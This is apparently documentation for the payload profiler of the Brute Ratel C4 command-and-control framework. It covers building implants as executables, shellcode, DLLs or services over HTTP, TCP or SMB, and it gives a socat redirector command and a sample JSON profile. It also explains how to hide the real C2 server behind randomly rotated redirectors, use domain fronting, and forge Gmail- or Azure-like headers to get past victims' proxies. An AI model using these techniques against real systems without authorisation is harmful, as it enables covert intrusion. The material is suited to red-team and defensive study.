Payload Profiler

C4 profiles provide a variety of options to configure and build payloads. These payload configurations can be quickly modified during offensive activities to either migrate to a different C4 server or inject a new payload to a new process on the go. There are 3 types of payload configurations:

  • HTTP/HTTPS
  • TCP
  • SMB

Payload Profiles via Brute Commander

The payloads can be configured to either make injectables, binaries or profilers to support fallback c2 channels. Each of the above 3 payload types can be configued to build an executable, shellcode in raw format (bin), shellcode in text format (hex), DLL library which can be executed using rundll32 or a Service executable. To add a new profile, select C4 Profiler->Payload Profiler in the Brute Commander and then selecting the ‘+’ icon in the Payload Profiler.

You can select between 3 options in the ‘Payload type’ field i.e HTTP, TCP or SMB. The ‘Config name’ field takes in a unique name for your config. This name will later be utilized if you want to inject this configuration with a payload into a remote process.

The ‘Host’ field is what we call as Nomad C2. Nomad badger is another new feature of BRc4 which was introduced in version 0.3. This feature provides server rotation functionality. When the badger is executed on a host, it will randomly select the redirectors mentioned in the ‘Host’ field everytime instead of connecting to a constant C2 server. The redirectors can route all the traffic to your C2 server using something like socat or nginx. This way your original C4 server stays hidden and you can host anywhere from 1 to 100 different redirectors all of which will be selected randomly during badger’s communication. This is a great way to establish connection to your server when you don’t know what categories are allowed by the victim’s proxy server and you have created multiple different servers with different categorization. A simple socat command to use as a redirector would be:


  socat TCP4-LISTEN:443,fork TCP4:your_c4_host_IP:443

The next option is the ‘port’ which is where your badger would connect to. The ‘Host header’ is optional. This was built to support Domain fronting. The ‘URI’ field is where your badger would connect to on your listener. The next field is ‘SSL’ to enabled SSL connection for your badger and then the authentication option for your C2 Server’s authentication. And the final option is the ‘Extra Headers’ option. This field takes up multiple headers in the form of key:value and each seperated by comma and newline as can be seen in the image below. These headers can be added randomly and doesn’t affect the C2 server. These are just to emulate any specific post requests like gmail/amazon/azure or anything else. Each header needs to be in a new line and should not contain any commas. Below is a quick example of a http payload configuration.

Similarly, if you select ‘SMB’ in the Payload type, you have to fill in a Named Pipe.

And, if you select ‘TCP’ in the Payload type, you have to fill in just a host, port and the C2 authentication.

Finally, you can view them all in the same Payload Profiler option as below:

Payload Profiles via C4 Profilers

These configurations can also be added via C4 Profiles. The C4 profile for a payload can be seen below. You don’t necessarily have to write all of the content you see below. You can just directly export the whole C4 profile once you’ve created it in the GUI and use them directly using the ‘-c’ command line option of the ratel server.

{
    "payload_config": {
        "main_http": {
            "c2_auth": "abcd@123",
            "c2_uri": [
                "content.php",
                "admin.php"
            ],
            "extra_headers": {
                "Cache-Control": "no-cache",
                "Connection": "close",
                "Cookie": "AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2; Version=default; id=a3fWa; Expires=Thu 31 Oct 2021 07:28:00 GMT;",
                "Pragma": "no-cache",
                "Referer": "https://mail.microsoft.com",
                "x-pm-apiversion": "3",
                "x-pm-appversion": "Web_3.16.33",
                "x-pm-uid": "d0e1f5b0dc08202064de25a",
                "Host": "test.azureedge.net"
            },
            "host": "10.10.10.1",
            "port": "443",
            "ssl": true,
            "type": "HTTP",
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
        },
        "main_tcp": {
            "c2_auth": "abcd@123",
            "host": "127.0.0.1",
            "port": "10000",
            "type": "TCP"
        },
        "main_smb": {
            "c2_auth": "abcd@123",
            "smb_pipe": "\\\\.\\pipe\\mynamedpipe",
            "type": "SMB"
        }
    }
}